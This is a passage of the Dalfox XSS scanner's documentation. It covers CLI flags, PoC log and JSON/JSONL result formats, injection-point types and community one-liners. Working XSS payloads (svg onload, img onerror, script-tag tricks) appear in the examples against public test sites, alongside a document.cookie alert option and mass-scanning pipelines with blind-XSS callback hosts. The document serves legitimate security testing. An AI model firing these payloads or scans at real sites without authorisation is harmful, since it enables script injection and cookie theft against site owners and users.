                                    * Example: --custom-alert-type=none / --custom-alert-type=str,none (default "none")
    --custom-alert-value string   Change alert value
                                    * Example: --custom-alert-value=document.cookie (default "1")
    --custom-payload string       Add custom payloads from file
-d, --data string                 Using POST Method and add Body data
    --debug                       debug mode, save all log using -o option
    --deep-domxss                 DOM XSS Testing with more payloads on headless [so slow]
    --delay int                   Milliseconds between send to same host (1000==1s)
-F, --follow-redirects            Following redirection
    --format string               Stdout output format
                                    * Supported: plain / json, jsonl (default "plain")
    --found-action string         If found weak/vuln, action(cmd) to next
                                    * Example: --found-action='./notify.sh'
    --found-action-shell string   Select shell application for --found-action (default "bash")
    --grep string                 Using custom grepping file
                                    * Example: --grep ./samples/sample_grep.json
-H, --header strings              Add custom headers
-h, --help                        help for dalfox
    --ignore-return string        Ignore scanning from return code
                                    * Example: --ignore-return 302,403,404
-X, --method string               Force overriding HTTP Method
                                    * Example: -X PUT (default "GET")
    --request-method              Use custom method for --trigger url ( default "GET" )
    --mining-dict                 Find new parameter with dictionary attack, default is Gf-Patterns=>XSS (default true)
-W, --mining-dict-word string     Custom wordlist file for param mining
                                    * Example: --mining-dict-word word.txt
    --mining-dom                  Find new parameter in DOM (attribute/js value) (default true)
    --no-color                    Not use colorize
    --no-spinner                  Not use spinner
    --only-custom-payload         Only testing custom payload (required --custom-payload)
    --only-discovery              Only testing parameter analysis (same '--skip-xss-scanning' option)
    --only-poc string             Shows only the PoC code for the specified pattern (g: grep / r: reflected / v: verified)
                                   * Example: --only-poc='g,v'
-o, --output string               Write to output file (By default, only the PoC code is saved)
    --output-all                  All log write mode (-o or stdout)
-p, --param strings               Only testing selected parameters
    --proxy string                Send all request to proxy server
                                    * Example: --proxy http://127.0.0.1:8080
    --remote-payloads string      Using remote payload for XSS testing
                                    * Supported: portswigger/payloadbox
                                    * Example: --remote-payloads=portswigger,payloadbox
    --remote-wordlists string     Using remote wordlists for param mining
                                    * Supported: burp/assetnote
                                    * Example: --remote-wordlists=burp
-S, --silence                     Not printing all logs
    --skip-bav                    Skipping BAV(Basic Another Vulnerability) analysis
    --skip-grepping               Skipping built-in grepping
    --skip-headless               Skipping headless browser base scanning[DOM XSS and inJS verify]
    --skip-mining-all             Skipping ALL parameter mining
    --skip-mining-dict            Skipping Dict base parameter mining
    --skip-mining-dom             Skipping DOM base parameter mining
    --skip-xss-scanning           Skipping XSS Scanning (same '--only-discovery' option)
    --timeout int                 Second of timeout (default 10)
    --user-agent string           Add custom UserAgent
-w, --worker int                  Number of worker (default 100)
```

---


## Format Of PoC (advanced)

# Format Of PoC

This guide provides a detailed explanation of the format of Proof of Concept (PoC) logs generated by Dalfox. The PoC log contains various information along with the PoC code. The distinction character between information data and PoC code is a blank space.

## Sample PoC Log

Here is a sample PoC log:

```
[POC][G][BUILT-IN/dalfox-error-mysql/GET] http://testphp.vulnweb.com/listproducts.php?artist=123&asdf=ff&cat=123Dalfox
[POC][V][GET] http://testphp.vulnweb.com/listproducts.php?artist=123&asdf=ff&cat=123%22%3E%3Csvg%2Fclass%3D%22dalfox%22onLoad%3Dalert%2845%29%3E
```

## PoC Log Format

| Identity | Type | Information                     | BLANK | PoC Code                                                     |
| -------- | ---- | ------------------------------- | ----- | ------------------------------------------------------------ |
| POC      | G    | BUILT-IN/dalfox-error-mysql/GET |       | http://testphp.vulnweb.com/listproducts.php?artist=123&asdf=ff&cat=123Dalfox |
| POC      | V    | GET                             |       | http://testphp.vulnweb.com/listproducts.php?artist=123&asdf=ff&cat=123%22%3E%3Csvg%2Fclass%3D%22dalfox%22onLoad%3Dalert%2845%29%3E |

### Explanation of Fields

- **Identity**: Always `POC` to indicate a Proof of Concept log entry.
- **Type**: Indicates the type of PoC. Possible values are:
  - `G` (Grep)
  - `R` (Reflected)
  - `V` (Verify)
- **Information**: Contains additional information such as the HTTP method and grepping name.
- **BLANK**: A blank space used as a delimiter.
- **PoC Code**: The actual PoC URL or payload.

## Why is there a gap?

The gap (blank space) is used to make it easier to parse only the PoC code using tools like `cut`. For example, you can extract the PoC code as follows:

```shell
dalfox url http://testphp.vulnweb.com/listproducts.php?cat=123&artist=123&asdf=ff | cut -d " " -f 2 > output
cat output
http://testphp.vulnweb.com/listproducts.php?artist=123&asdf=ff&cat=123Dalfox
http://testphp.vulnweb.com/listproducts.php?artist=123&asdf=ff&cat=123%22%3E%3Csvg%2FOnLoad%3D%22%60%24%7Bprompt%60%60%7D%60%22+class%3Ddalfox%3E
```

---


## Injectable Points (advanced)

# Injectable Points

This guide provides detailed information on the various injectable points that Dalfox can identify during scans. Understanding these points can help you better interpret the results and understand where and how payloads are being injected.

## Injected Points

Dalfox identifies several types of injectable points in the response. Here are the main categories:

- **inHTML-none**: Injection point within HTML content without any surrounding quotes.
- **inJS-none**: Injection point within JavaScript content without any surrounding quotes.
- **inJS-double**: Injection point within JavaScript content surrounded by double quotes.
- **inJS-single**: Injection point within JavaScript content surrounded by single quotes.
- **inJS-backtick**: Injection point within JavaScript content surrounded by backticks.
- **inATTR-none**: Injection point within an HTML attribute without any surrounding quotes.
- **inATTR-double**: Injection point within an HTML attribute surrounded by double quotes.
- **inATTR-single**: Injection point within an HTML attribute surrounded by single quotes.

## Parameter Types

Dalfox can identify injectable points in different types of parameters:

- **URL**: Parameters passed in the URL query string.
- **FORM**: Parameters passed in the body of a form submission.

## Example

To illustrate how these injectable points work, consider the following example:

### inJS-double-URL

This indicates that a value entered into the URL query is reflected in a JavaScript context within double quotes in the response.

**Request**

```
/q=testabcd
```

**Response**

```html
<script>
  var a = "testabcd";
</script>
```

In this example, the value `testabcd` is injected into the JavaScript context within double quotes.

---


## Result JSON Format (advanced)

# Result JSON Format

This guide provides a detailed explanation of the JSON format used for scan results generated by Dalfox. Understanding this format can help you better interpret the results and integrate them with other tools.

## Scan Result

Here is an example of a scan result in JSON format:

```json
{
 "logs": null,
 "pocs": [
  {
   "type": "V",
   "inject_type": "inHTML-none(1)-URL",
   "poc_type": "plain",
   "method": "GET",
   "data": "https://xss-game.appspot.com/level1/frame?query=%3Caudio+controls+ondurationchange%3Dalert%281%29+id%3Ddalfox%3E%3Csource+src%3D1.mp3+type%3Daudio%2Fmpeg%3E%3C%2Faudio%3E",
   "param": "query",
   "payload": "\u003caudio controls ondurationchange=alert(1) id=dalfox\u003e\u003csource src=1.mp3 type=audio/mpeg\u003e\u003c/audio\u003e",
   "evidence": "13 line:  s were found for \u003cb\u003e\u003caudio controls ondurationchange=alert(1) id=dalfox\u003e\u003csource ",
   "cwe": "CWE-79",
   "severity": "High",
   "message_id": 223,
   "message_str": "Triggered XSS Payload (found DOM Object): query=\u003caudio controls ondurationchange=alert(1) id=dalfox\u003e\u003csource src=1.mp3 type=audio/mpeg\u003e\u003c/audio\u003e",
   "raw_request": "GET /level1/frame?query=%3Caudio+controls+ondurationchange%3Dalert%281%29+id%3Ddalfox%3E%3Csource+src%3D1.mp3+type%3Daudio%2Fmpeg%3E%3C%2Faudio%3E HTTP/1.1\r\nHost: xss-game.appspot.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\r\nAccept-Encoding: gzip\r\n\r\n"
  }
 ],
 "params": [
  {
   "Name": "query",
   "Type": "URL",
   "Reflected": true,
   "ReflectedPoint": "/inHTML-none(1)",
   "ReflectedCode": "13 line:  Sorry, no results were found for \u003cb\u003eDalfox\u003c/b\u003e. \u003ca href='?'\u003eTry again",
   "Chars": [
    "\\",
    ")",
    "|",
    "\"",
    "'",
    "-",
    "`",
    "\u003e",
    "$",
    "+",
    "]",
    "=",
    ";",
    ":",
    "[",
    "}",
    "{",
    ",",
    "(",
    ".",
    "\u003c"
   ]
  }
 ],
 "duration": 4841809667,
 "start_time": "2023-03-28T11:07:15.574531+09:00",
 "end_time": "2023-03-28T11:07:20.416285+09:00"
}
```

## PoC

Here is a detailed explanation of the PoC (Proof of Concept) section in the JSON result:

```json
{
      "type":"Type of PoC (G/R/V)",
      "inject_type":"Injected Point",
      "poc_type":"plain/curl/httpie/etc...",
      "method":"HTTP Method",
      "data":"PoC URL",
      "param":"Parameter",
      "payload":"Attack Value",
      "evidence":"Evidence with response body",
      "cwe":"CWE ID",
      "severity": "Severity (Low/Medium/High)",
      "message_id": "Message ID",
      "message_str": "Message String (POC)",
      "raw_request": "Raw HTTP Request (require --output-request flag)",
      "raw_response": "Raw HTTP Response (require --output-response flag)"
}
```

### Explanation of Fields

| Key           | Description                 | List                                                         |
| ------------- | --------------------------- | ------------------------------------------------------------ |
| type          | Type                        | - G (Grep)<br />- R (Reflected)<br />- V (Verified)          |
| inject_type   | Injected point              | - inHTML-none (Injected in HTML area)<br />- inJS-none (Injected in Javascript area)<br />- inJS-double (Injected within `"` in Javascript area)<br />- inJS-single (Injected within `'` in Javascript area)<br />- inJS-backtick (Injected within backtick in Javascript area)<br />- inATTR-none (Injected within in Tag attribute area)<br />- inATTR-double (Injected within `"` in Tag attribute area)<br />- inATTR-single (Injected within `'` in Tag attribute area) |
| poc_type      | Type of PoC code            | - plain (URL)<br />- curl (Curl command)<br />- httpie (HTTPie command) |
| method        | HTTP Method                 | - GET/POST/PUT/DELETE, etc.                                  |
| data          | PoC (URL)                   | - PoC URL                                                    |
| param         | Parameter name              | - Weak parameter name                                        |
| payload       | Parameter value             | - Attack code in value                                       |
| evidence      | Evidence with response body | - Simple code view of where it's injected in response body.  |
| cwe           | CWE ID                      | - Mapping CWE ID                                             |
| severity      | Severity                    | - Severity (Low/Medium/High)                                 |
| raw_request   | Raw HTTP Request            | - Raw HTTP Request                                           |
| raw_response  | Raw HTTP Response           | - Raw HTTP Response                                          |

### Example PoC

```json
{
    "type": "V",
    "inject_type": "inHTML-URL",
    "poc_type": "plain",
    "method": "GET",
    "data": "http://testphp.vulnweb.com/listproducts.php?cat=%27%22%3E%3Cimg%2Fsrc%2Fonerror%3D.1%7Calert%60%60+class%3Ddalfox%3E",
    "param": "cat",
    "payload": "'\"><img/src/onerror=.1|alert`` class=dalfox>",
    "evidence": "48 line:  syntax to use near ''\"><img/src/onerror=.1|alert`` class=dalfox>' at line 1",
    "cwe": "CWE-79",
    "severity": "High"
}
```

---


## Result JSONL Format (advanced)

# Result JSONL Format
{: .d-inline-block }

New (v2.11.0) 
{: .label .label-blue }

This guide provides a detailed explanation of the JSONL (JSON Lines) format used for scan results generated by Dalfox. Understanding this format can help you better interpret the results and integrate them with other tools.

## JSONL Format Overview

JSONL (JSON Lines) is a convenient format for storing structured data that may be processed one record at a time. Each line is a valid JSON object, and lines are separated by a newline character. This makes it ideal for streaming and processing large datasets, as you can process each line independently.

## Scan Result

Here is an example of scan results in JSONL format:

```json
{"type":"R","inject_type":"inHTML","poc_type":"plain","method":"GET","data":"https://xss-game.appspot.com/level1/frame?query=%27%3E%3Ca+href%3Djavas%26%2399%3Bript%3Aalert%281%29%2Fclass%3Ddalfox%3Eclick","param":"query","payload":"'\u003e\u003ca href=javas\u0026#99;ript:alert(1)/class=dalfox\u003eclick","evidence":"13 line:  s were found for \u003cb\u003e'\u003e\u003ca href=javas\u0026#99;ript:alert(1)/class=dalfox\u003eclick\u003c/b\u003e. \u003ca","cwe":"CWE-79","severity":"Medium","message_id":174,"message_str":"Reflected Payload in HTML: query='\u003e\u003ca href=javas\u0026#99;ript:alert(1)/class=dalfox\u003eclick"}
{"type":"R","inject_type":"inHTML","poc_type":"plain","method":"GET","data":"https://xss-game.appspot.com/level1/frame?query=%27%22%3E%3Csvg%2Fonload%3D%26%2397%26%23108%26%23101%26%23114%26%2300116%26%2340%26%2341%26%23x2f%26%23x2f","param":"query","payload":"'\"\u003e\u003csvg/onload=\u0026#97\u0026#108\u0026#101\u0026#114\u0026#00116\u0026#40\u0026#41\u0026#x2f\u0026#x2f","evidence":"13 line:  s were found for \u003cb\u003e'\"\u003e\u003csvg/onload=\u0026#97\u0026#108\u0026#101\u0026#114\u0026#00116\u0026#40\u0026#41\u0026#x2f\u0026#x2f\u003c","cwe":"CWE-79","severity":"Medium","message_id":242,"message_str":"Reflected Payload in HTML: query='\"\u003e\u003csvg/onload=\u0026#97\u0026#108\u0026#101\u0026#114\u0026#00116\u0026#40\u0026#41\u0026#x2f\u0026#x2f"}
{"type":"V","inject_type":"inHTML","poc_type":"plain","method":"GET","data":"https://xss-game.appspot.com/level1/frame?query=%3C%2FScriPt%3E%3CsCripT+id%3Ddalfox%3Ealert%281%29%3C%2FsCriPt%3E","param":"query","payload":"\u003c/ScriPt\u003e\u003csCripT id=dalfox\u003ealert(1)\u003c/sCriPt\u003e","evidence":"13 line:  s were found for \u003cb\u003e\u003c/ScriPt\u003e\u003csCripT id=dalfox\u003ealert(1)\u003c/sCriPt\u003e\u003c/b\u003e. \u003ca href='?","cwe":"CWE-79","severity":"High","message_id":162,"message_str":"Triggered XSS Payload (found DOM Object): query=\u003c/ScriPt\u003e\u003csCripT id=dalfox\u003ealert(1)\u003c/sCriPt\u003e"}
```

## PoC

Here is a detailed explanation of the PoC (Proof of Concept) section in the JSON result:

```json
{
      "type":"Type of PoC (G/R/V)",
      "inject_type":"Injected Point",
      "poc_type":"plain/curl/httpie/etc...",
      "method":"HTTP Method",
      "data":"PoC URL",
      "param":"Parameter",
      "payload":"Attack Value",
      "evidence":"Evidence with response body",
      "cwe":"CWE ID",
      "severity": "Severity (Low/Medium/High)",
      "message_id": "Message ID",
      "message_str": "Message String (POC)",
      "raw_request": "Raw HTTP Request (require --output-request flag)",
      "raw_response": "Raw HTTP Response (require --output-response flag)"
}
```

### Explanation of Fields

| Key           | Description                 | List                                                         |
| ------------- | --------------------------- | ------------------------------------------------------------ |
| type          | Type                        | - G (Grep)<br />- R (Reflected)<br />- V (Verified)          |
| inject_type   | Injected point              | - inHTML-none (Injected in HTML area)<br />- inJS-none (Injected in Javascript area)<br />- inJS-double (Injected within `"` in Javascript area)<br />- inJS-single (Injected within `'` in Javascript area)<br />- inJS-backtick (Injected within backtick in Javascript area)<br />- inATTR-none (Injected within in Tag attribute area)<br />- inATTR-double (Injected within `"` in Tag attribute area)<br />- inATTR-single (Injected within `'` in Tag attribute area) |
| poc_type      | Type of PoC code            | - plain (URL)<br />- curl (Curl command)<br />- httpie (HTTPie command) |
| method        | HTTP Method                 | - GET/POST/PUT/DELETE, etc.                                  |
| data          | PoC (URL)                   | - PoC URL                                                    |
| param         | Parameter name              | - Weak parameter name                                        |
| payload       | Parameter value             | - Attack code in value                                       |
| evidence      | Evidence with response body | - Simple code view of where it's injected in response body.  |
| cwe           | CWE ID                      | - Mapping CWE ID                                             |
| severity      | Severity                    | - Severity (Low/Medium/High)                                 |
| raw_request   | Raw HTTP Request            | - Raw HTTP Request                                           |
| raw_response  | Raw HTTP Response           | - Raw HTTP Response                                          |

### Example PoC

```json
{
    "type": "V",
    "inject_type": "inHTML-URL",
    "poc_type": "plain",
    "method": "GET",
    "data": "http://testphp.vulnweb.com/listproducts.php?cat=%27%22%3E%3Cimg%2Fsrc%2Fonerror%3D.1%7Calert%60%60+class%3Ddalfox%3E",
    "param": "cat",
    "payload": "'\"><img/src/onerror=.1|alert`` class=dalfox>",
    "evidence": "48 line:  syntax to use near ''\"><img/src/onerror=.1|alert`` class=dalfox>' at line 1",
    "cwe": "CWE-79",
    "severity": "High"
}
```

---


## One-Liner (community)

# Community One-Liners

* Scanning XSS from host / from [@cihanmehmet in awesome-oneliner-bugbounty](https://github.com/dwisiswant0/awesome-oneliner-bugbounty)
```bash
gospider -S targets_urls.txt -c 10 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)" --other-source | grep -e "code-200" | awk '{print $5}'| grep "=" | qsreplace -a | dalfox pipe | tee result.txt
```
* [Automating XSS using Dalfox, GF and Waybackurls](https://medium.com/bugbountywriteup/automating-xss-using-dalfox-gf-and-waybackurls-bc6de16a5c75)
```bash
cat test.txt | gf xss | sed ‘s/=.*/=/’ | sed ‘s/URL: //’ | tee testxss.txt ; dalfox file testxss.txt -b yours-xss-hunter-domain(e.g yours.xss.ht)
```
* [Find XSS and Blind XSS, and send every request to burpsuite for more manual testing
](https://twitter.com/Alra3ees/status/1407058456323014659)
```bash
dalfox file hosts --mining-dom  --deep-domxss --ignore-return -b 'YOURS.xss.ht' --follow-redirects --proxy http://127.0.0.1:8080
```
* [dalfox scan to bugbounty targets / from KingOfBugBountyTips](https://github.com/KingOfBugbounty/KingOfBugBountyTips#dalfox-scan-to-bugbounty-targets-1)
```bash
wget https://raw.githubusercontent.com/arkadiyt/bounty-targets-data/master/data/domains.txt -nv ; cat domains.txt | anew | httpx -silent -threads 500 | xargs -I@ dalfox url @
```
* [Recon subdomains and gau to search vuls Dalfox / from KingOfBugBountyTips](https://github.com/KingOfBugbounty/KingOfBugBountyTips#recon-subdomains-and-gau-to-search-vuls-dalfox)
```bash
assetfinder testphp.vulnweb.com | gau |  dalfox pipe
```

---


## Resources (community)

# Community Resources

This page gathers various resources related to Dalfox, including articles, videos, and tutorials.

## Articles

- [Dalfox: My New Weapon for XSS](https://www.hahwul.com/2020/04/22/my-new-xss-tool-dalfox/)

## Videos

- [Find XSS the easy way! Dalfox - Hacker Tools @Intigriti](https://www.youtube.com/watch?v=m64aviF1Two&pp=ugMICgJrbxABGAHKBQZkYWxmb3g%3D)
- [Dalfox XSS Automation Scanner for Bug Bounty @Meta4sec](https://www.youtube.com/watch?v=EJzf_g0Vw38&pp=ygUGZGFsZm94)
- [Testing XSS Tools On Target Protected By WAF @BePractical](https://www.youtube.com/watch?v=_oLyUxRMnJk)
- [More](https://www.youtube.com/results?search_query=dalfox)

## Tutorials

- [Dalfox – Hacker Tools: XSS Scanning Made Easy 👩‍💻](https://blog.intigriti.com/hacking-tools/hacker-tools-dalfox)

---

